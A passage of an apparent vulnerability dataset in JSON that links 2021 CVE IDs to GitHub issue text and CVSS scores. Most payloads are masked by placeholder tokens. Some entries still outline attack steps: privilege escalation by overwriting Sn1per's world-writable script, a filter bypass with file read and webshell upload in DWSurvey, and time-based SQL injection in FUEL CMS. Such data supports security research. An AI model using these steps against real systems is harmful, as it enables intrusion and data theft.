        "Issue_Url_new": "https://github.com/adodb/adodb/issues/793",
        "Repo_new": "adodb/adodb",
        "Issue_Created_At": "2022-01-16T15:49:35Z",
        "description": "Reserved.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38712",
        "Issue_Url_old": "https://github.com/helloxz/onenav/issues/25",
        "Issue_Url_new": "https://github.com/helloxz/onenav/issues/25",
        "Repo_new": "helloxz/onenav",
        "Issue_Created_At": "2021-08-04T08:58:49Z",
        "description": "disclosure of information about sqlite. disclosure of information about sqlite I download this cms and i first install it . FILETAG APITAG CODETAG bug code : APITAG then i try to require PATHTAG and PATHTAG http response status NUMBERTAG it means i can download onenav.db3 and FILETAG can gets some privacy information you can add some random code to document name or sqlite database name . this cms has many users.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38713",
        "Issue_Url_old": "https://github.com/helloxz/imgurl/issues/72",
        "Issue_Url_new": "https://github.com/helloxz/imgurl/issues/72",
        "Repo_new": "helloxz/imgurl",
        "Issue_Created_At": "2021-08-16T02:29:43Z",
        "description": "Store Cross Site Script Attack on Upload HTTP Request Header . Hi, how is going? I test imgurl upload functions. And I found a XSS vulnarability. First step\uff1a Put payload on upload header : ERRORTAG FILETAG FILETAG Second then web administrator click FILETAG FILETAG FILETAG The method to solve it: all the request header filter special character\u3002 \u8fc7\u6ee4http\u8bf7\u6c42\u5934\u7684\u6240\u6709\u7279\u6b8a\u5b57\u7b26\u3002",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-38721",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/584",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/584",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2021-08-10T01:37:40Z",
        "description": "FUEL CMS NUMBERTAG contains a cross site request forgery (CSRF) vulnerability. Because my mailbox function is not configured, it cannot be fully demonstrated. There is a CSRF vulnerability in the password modification page. URLTAG FILETAG csrf POC: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-38723",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/583",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/583",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2021-08-10T01:26:43Z",
        "description": "FUEL CMS NUMBERTAG allows SQL Injection via parameter 'col' in PATHTAG FILETAG CODETAG payload: APITAG FILETAG FILETAG You can see that when you modify the sleep value, the response has a significant delay.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-38725",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/581",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/581",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2021-08-09T03:09:21Z",
        "description": "Fuel CMS NUMBERTAG has a brute force vulnerability . IN the forgot password page. Because there is no limit on the number of times, An attacker can brute crack the email address of the administrator. FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38727",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/582",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/582",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2021-08-10T01:22:52Z",
        "description": "FUEL CMS NUMBERTAG allows SQL Injection via parameter 'col' in PATHTAG FILETAG FILETAG CODETAG payload : APITAG FILETAG FILETAG You can see that when you modify the sleep value, the response has a significant delay.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38751",
        "Issue_Url_old": "https://github.com/exponentcms/exponent-cms/issues/1544",
        "Issue_Url_new": "https://github.com/exponentcms/exponent-cms/issues/1544",
        "Repo_new": "exponentcms/exponent-cms",
        "Issue_Created_At": "2021-08-10T04:04:36Z",
        "description": "HTTP Host Header Attack. Host value in HTTP header is not checked. Modifying Host header in HTTP request modifies the all links to an arbitrary value. Included example request, result, and location of bug in the source code. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-38754",
        "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/7",
        "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/7",
        "Repo_new": "kishan0725/hospital-management-system",
        "Issue_Created_At": "2021-08-11T02:47:29Z",
        "description": "SQL Injection Vulnerability in Message Search. Intercept message search and save contents into a text file. FILETAG Run APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38755",
        "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/5",
        "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/5",
        "Repo_new": "kishan0725/hospital-management-system",
        "Issue_Created_At": "2021-08-11T02:12:04Z",
        "description": "Unauthenticated Doctor Deletion Vulnerability. Crafted HTTP packet can delete doctors without being authenticated as receptionist/admin. FILETAG Before: FILETAG After: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38756",
        "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/4",
        "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/4",
        "Repo_new": "kishan0725/hospital-management-system",
        "Issue_Created_At": "2021-08-11T01:57:20Z",
        "description": "Persistent Cross Site Scripting (XSS) Vulnerability in Prescription. Add XSS in Prescription as DOCTOR FILETAG Login as ADMIN FILETAG Persistent XSS upon logging in as ADMIN FILETAG Issue in FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-38757",
        "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/6",
        "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/6",
        "Repo_new": "kishan0725/hospital-management-system",
        "Issue_Created_At": "2021-08-11T02:15:37Z",
        "description": "Persistent Cross Site Scripting (XSS) Vulnerability in Contact Page. Add XSS to message section of Contact page to target receptionist/admin. FILETAG Log in as receptionist/admin. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39157",
        "Issue_Url_old": "https://github.com/sonicdoe/detect-character-encoding/issues/15",
        "Issue_Url_new": "https://github.com/sonicdoe/detect-character-encoding/issues/15",
        "Repo_new": "sonicdoe/detect-character-encoding",
        "Issue_Created_At": "2018-11-06T09:49:01Z",
        "description": "A native crash. CRASH STACK NUMBERTAG fbf NUMBERTAG ea NUMBERTAG in APITAG const () from PATHTAG NUMBERTAG fbf NUMBERTAG d NUMBERTAG b in APITAG const&) () from PATHTAG NUMBERTAG fbf NUMBERTAG cf NUMBERTAG in APITAG const&) () from PATHTAG USE THIS DEMO TO REAPPEARS: function APITAG { APITAG let APITAG = new Buffer('AD', 'hex'); const APITAG = require('detect character encoding'); const APITAG = APITAG APITAG APITAG } FIXUP DIFF: diff git APITAG APITAG index APITAG NUMBERTAG APITAG +++ APITAG APITAG NUMBERTAG APITAG APITAG { APITAG = APITAG APITAG + if(NULL == APITAG { + ERRORTAG to charset not match.\"); + APITAG + return; + } + APITAG { ERRORTAG to detect charset.\"); APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-39191",
        "Issue_Url_old": "https://github.com/zmartzone/mod_auth_openidc/issues/672",
        "Issue_Url_new": "https://github.com/openidc/mod_auth_openidc/issues/672",
        "Repo_new": "openidc/mod_auth_openidc",
        "Issue_Created_At": "2021-09-02T16:50:58Z",
        "description": "open redirect for target_link_uri parameter. see URLTAG thanks MENTIONTAG Recently we have forged a URL for a phishing attack that redirects the user, after their authentication on our OP, to any site of our choice. the forged url is as follows: APITAG example: APITAG After authentication, user is redirect to FILETAG According to the APITAG Connect documentation, URLTAG > \"target_link_uri > OPTIONAL. URL that the RP is requested to redirect to after authentication. RPs MUST verify the value of the target_link_uri to prevent being used as an open redirector to external sites.\" > Does the module verify the value of the target_link_uri to prevent being used as an open redirector to external sites? and how to configure it in the module?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39194",
        "Issue_Url_old": "https://github.com/charleskorn/kaml/issues/179",
        "Issue_Url_new": "https://github.com/charleskorn/kaml/issues/179",
        "Repo_new": "charleskorn/kaml",
        "Issue_Created_At": "2021-09-02T18:45:21Z",
        "description": "Polymorphic serialization hangs. Hello. Many thanks for this great library. We ran into an issue that is quite strange. The deserialization hangs in this specific case, meaning that the process does not terminate, but uses NUMBERTAG CPU. CODETAG This is what I see when I pause and enter debugger FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39222",
        "Issue_Url_old": "https://github.com/nextcloud/spreed/issues/542",
        "Issue_Url_new": "https://github.com/nextcloud/spreed/issues/542",
        "Repo_new": "nextcloud/spreed",
        "Issue_Created_At": "2018-01-06T10:37:14Z",
        "description": "When APITAG NUMBERTAG get released?. General Question When APITAG NUMBERTAG get released? Thanks",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39273",
        "Issue_Url_old": "https://github.com/1N3/Sn1per/issues/358",
        "Issue_Url_new": "https://github.com/1n3/sn1per/issues/358",
        "Repo_new": "1N3/Sn1per",
        "Issue_Created_At": "2021-08-17T15:43:44Z",
        "description": "Insecure permissions NUMBERTAG recursively set on installation directory and all files after running main script allow privilege escalation/code execution as root. Sn1per NUMBERTAG free edition, Ubuntu NUMBERTAG Installation directory permissions before first run of the script: root APITAG ls la PATHTAG total NUMBERTAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG Dockerfile rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG bin drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG conf rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG loot drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG modes drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG plugins drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG pro rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG sniper rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG templates rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG wordlists Running sn1per: root APITAG sniper t APITAG [ ] Loaded configuration file from PATHTAG [OK] [ ] Loaded configuration file from APITAG [OK] [ ] Saving loot to PATHTAG [OK] [ ] Scanning APITAG [OK] ... [ ] Opening loot directory PATHTAG [OK] + =[ Generating reports... [snip] + =[ Sorting all files... + =[ Removing blank screenshots and files... + =[ Sn1per Professional is not installed. To download Sn1per Professional, go to FILETAG + =[ Done! Permissions on installation directory after script finishes: root APITAG ls la PATHTAG total NUMBERTAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG Dockerfile rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG bin drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG conf rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG loot drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG modes drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG plugins drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG pro rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwsrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG sniper rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG templates rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG wordlists Issue: Lines NUMBERTAG from init function from main script: chmod NUMBERTAG Rf $INSTALL_DIR NUMBERTAG dev/null chown root $INSTALL_DIR/sniper NUMBERTAG dev/null chmod NUMBERTAG INSTALL_DIR/sniper NUMBERTAG dev/null",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39274",
        "Issue_Url_old": "https://github.com/1N3/Sn1per/issues/357",
        "Issue_Url_new": "https://github.com/1n3/sn1per/issues/357",
        "Repo_new": "1N3/Sn1per",
        "Issue_Created_At": "2021-08-17T15:39:45Z",
        "description": "Insecure permissions NUMBERTAG on installation folder after running install script allow code execution/privilege escalation.. Sn1per NUMBERTAG free, tested on Ubuntu NUMBERTAG root APITAG uname a Linux snipertest NUMBERTAG gcp NUMBERTAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG APITAG root APITAG cat /etc/lsb release APITAG DISTRIB_RELEASE NUMBERTAG DISTRIB_CODENAME=hirsute APITAG NUMBERTAG Issue is from FILETAG script lines NUMBERTAG snip] mkdir p $INSTALL_DIR NUMBERTAG dev/null chmod NUMBERTAG Rf $INSTALL_DIR NUMBERTAG dev/null chown root $INSTALL_DIR/sniper NUMBERTAG dev/null chmod NUMBERTAG INSTALL_DIR/sniper NUMBERTAG dev/null [snip] root APITAG ls ld PATHTAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG PATHTAG user APITAG id uid NUMBERTAG user) gid NUMBERTAG user) APITAG sudoers) user APITAG cd PATHTAG PATHTAG ls la total NUMBERTAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG Dockerfile rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG bin drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG conf rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG loot drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG modes drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG plugins drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG pro rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG sniper rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG templates rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG wordlists NUMBERTAG Code execution as root via main script modification: PATHTAG mv sniper . APITAG PATHTAG echo \"touch /proof\" > sniper PATHTAG cat . APITAG >> sniper PATHTAG chmod +x sniper PATHTAG ls la sniper rwxrwxr NUMBERTAG user user NUMBERTAG Aug NUMBERTAG sniper PATHTAG root APITAG sniper [ ] Loaded configuration file from PATHTAG [OK] [ ] Loaded configuration file from APITAG [OK] ____ _________ / _/___ ___ _____ / ___/ __ \\ / // __ \\/ _ \\/ ___/ (__ ) / / // // /_/ / __/ / PATHTAG PATHTAG PATHTAG /_/ + =[ FILETAG + =[ Sn1per NUMBERTAG by MENTIONTAG You need to specify a target or workspace to use. Type sniper help for command usage. root APITAG root APITAG ls la /proof rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG proof NUMBERTAG Code execution as root via config file modification PATHTAG mv APITAG . APITAG PATHTAG echo \"touch /proof2\" > APITAG PATHTAG cat . APITAG >> APITAG PATHTAG root APITAG ls la /proof2 ls: cannot access '/proof2': No such file or directory root APITAG sniper [ ] Loaded configuration file from PATHTAG [OK] [ ] Loaded configuration file from APITAG [OK] ____ _________ / _/___ ___ _____ / ___/ __ \\ / // __ \\/ _ \\/ ___/ (__ ) / / // // /_/ / __/ / PATHTAG PATHTAG PATHTAG /_/ + =[ FILETAG + =[ Sn1per NUMBERTAG by MENTIONTAG You need to specify a target or workspace to use. Type sniper help for command usage. root APITAG ls la /proof2 rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG proof2 root APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-39371",
        "Issue_Url_old": "https://github.com/geopython/OWSLib/issues/790",
        "Issue_Url_new": "https://github.com/geopython/owslib/issues/790",
        "Repo_new": "geopython/owslib",
        "Issue_Created_At": "2021-07-29T18:30:55Z",
        "description": "Propose to replace lxml with defusedxml. The vulnerabilities caused by using lxml can be addressed by using defusedxml URLTAG . I've had success with just replacing APITAG with APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-39383",
        "Issue_Url_old": "https://github.com/wkeyuan/DWSurvey/issues/81",
        "Issue_Url_new": "https://github.com/wkeyuan/dwsurvey/issues/81",
        "Repo_new": "wkeyuan/dwsurvey",
        "Issue_Created_At": "2021-08-16T02:59:50Z",
        "description": "There is a remote command execution vulnerability. The save method in the PATHTAG file directly accepts the parameters passed from the client to write to the file, and the file is directly included in FILETAG , resulting in rce A file write operation was performed on the specified file in the APITAG method FILETAG In the save method, the APITAG method is invoked to write the FILETAG , and the APITAG variable comes from the assignment at the beginning of the Sava method. FILETAG FILETAG FILETAG The APITAG method of the APITAG class filters the request parameters by judging whether the URI contains APITAG FILETAG You can see that it is mainly Chinese substitution for special characters FILETAG Since it is determined whether to call the filter function by judging whether the URI contains APITAG , it can be bypassed by adding APITAG in front of the path Finally, it is found in FILETAG that the file is included FILETAG Poc: ERRORTAG visit URLTAG , success rce: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-39384",
        "Issue_Url_old": "https://github.com/wkeyuan/DWSurvey/issues/80",
        "Issue_Url_new": "https://github.com/wkeyuan/dwsurvey/issues/80",
        "Repo_new": "wkeyuan/dwsurvey",
        "Issue_Created_At": "2021-08-16T02:45:58Z",
        "description": "There are arbitrary file reading vulnerabilities and background rce vulnerabilities. In the latest version of dwsurvey oss NUMBERTAG there is a APITAG Request forwarding. Since the same request object and response object are shared before and after forwarding, the forwarded response will be output to the byte array buffer in memory, and finally the file is written in the printstream function. Because APITAG is a jump between internal resources, you can request internal sensitive files on the server, such as: / WEB INF / FILETAG , causing arbitrary file vulnerabilities by writing and re accessing; In addition, it can also cause rce in combination with background file upload. Request forwarding exists in the server method in the PATHTAG file FILETAG Due to the existence of bytearrayoutputstream, the forwarded response is saved in the byte array buffer in memory The flushdo function was passed in FILETAG Here, it is converted into a string and assigned to the document variable FILETAG Pass in printstream function FILETAG Splice savepath and filename as the target file, and finally write the response content to the file. The savepath and filename variables can also be controlled from the above FILETAG payload\uff1a URLTAG The FILETAG file will be written in the web root directory and then accessed FILETAG Successfully read database configuration file: FILETAG You can also find a file upload place in the background to create rce, create a new questionnaire > Advanced Editor in the background, and upload a picture horse and burpsuite to capture the package FILETAG FILETAG Visit FILETAG \uff0cthe JSP file will be generated in the web root directory Due to the Jsoup. parse method resolution to escape of JSP tags, when tested, when using the ' APITAG APITAG ' tag to package payload, can successfully bypass escaped FILETAG So the uploaded image file content is: APITAG APITAG APITAG Visit URLTAG successfully rce: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-39390",
        "Issue_Url_old": "https://github.com/partkeepr/PartKeepr/issues/1237",
        "Issue_Url_new": "https://github.com/partkeepr/partkeepr/issues/1237",
        "Repo_new": "partkeepr/partkeepr",
        "Issue_Created_At": "2022-02-22T12:47:49Z",
        "description": "Stored XSS in APITAG Description Stored XSS in APITAG NUMBERTAG Edit section in multiple api endpoints via name parameter Reproduction Steps Browsing to Edit tab, select project and add new project. There, insert the following payload ERRORTAG in name field. APITAG The request performed is the following, being name the vulnerable parameter : ERRORTAG Then, when another user goes to edit tab and clicks the project with the payload as name, XSS triggers APITAG Apart from projects , the following tabs are also vulnerable : footprints , manufacturers , storage locations , distributors , part measurement units , units and batch jobs System Information APITAG Version NUMBERTAG Operating System: APITAG Web Server: Apache PHP Version NUMBERTAG Database and version: Mysql Reproducible on the demo system: Yes",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-39391",
        "Issue_Url_old": "https://github.com/beego/beego/issues/4727",
        "Issue_Url_new": "https://github.com/beego/beego/issues/4727",
        "Repo_new": "beego/beego",
        "Issue_Created_At": "2021-08-15T12:28:51Z",
        "description": "XSS in Admin Panel. When navigating to a page, the path is not sanitized in the APITAG statistics\" in the admin panel, leading to an XSS. For example, navigating to APITAG leads to an alert when viewed on the admin panel: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39416",
        "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/17",
        "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/17",
        "Repo_new": "remoteclinic/remoteclinic",
        "Issue_Created_At": "2021-08-16T11:38:23Z",
        "description": "Multiple Cross Site Scripting Vulnerabilities in Remote Clinic NUMBERTAG In Remote Clinic NUMBERTAG there are multiple Cross Site Scripting vulnerabilities via the Contact, Email, Weight, Profession, ref_contact, and address parameters in FILETAG are vulnerable due to the _POSTs not being sanitized properly for XSS despite being sent through the friendly function. In Remote Clinic NUMBERTAG there is Stored Cross Site Scripting and no sanitization for the gender, age, serial parameters when retrieved by _POST in FILETAG to be sent to the database. This is possible by changing the values in the dropdowns in the inspect menu. In Remote Clinic NUMBERTAG in FILETAG , the Contact, Email, Weight, Profession, ref_contact, and address parameters being edited are not sanitized for Cross Site Scripting when they are retrieved by _POST. In Remote APITAG NUMBERTAG in FILETAG , the serial, age, and gender dropdowns are able to be changed via the inspect menu In Remote Clinic NUMBERTAG in FILETAG , the Title, First Name, Last Name, Skype, and Address parameters sent by _POST to be put in the database, is unsanitized and prone to Cross Site Scripting (XSS) In Remote Clinic NUMBERTAG in FILETAG , most of the parameters being passed into the database are sanitized insufficiently. The parameters that allow Cross Site Scripting are portal_name, guardian_short_name, guardian_name, opening_time, closing_time, access_level NUMBERTAG access_level NUMBERTAG access_level NUMBERTAG access_level NUMBERTAG access_level NUMBERTAG currency, mobile_number, address, patient_contact, patient_address, and patient_email.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-39480",
        "Issue_Url_old": "https://github.com/m4b/bingrep/issues/30",
        "Issue_Url_new": "https://github.com/m4b/bingrep/issues/30",
        "Repo_new": "m4b/bingrep",
        "Issue_Created_At": "2021-08-09T12:42:31Z",
        "description": "memory allocation of NUMBERTAG bytes failed FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-39491",
        "Issue_Url_old": "https://github.com/yogeshojha/rengine/issues/460",
        "Issue_Url_new": "https://github.com/yogeshojha/rengine/issues/460",
        "Repo_new": "yogeshojha/rengine",
        "Issue_Created_At": "2021-08-20T03:48:35Z",
        "description": "FILETAG I have confirmed that this issue can be reproduced as described on a latest version/pull of APITAG yes Technical details Debian NUMBERTAG",
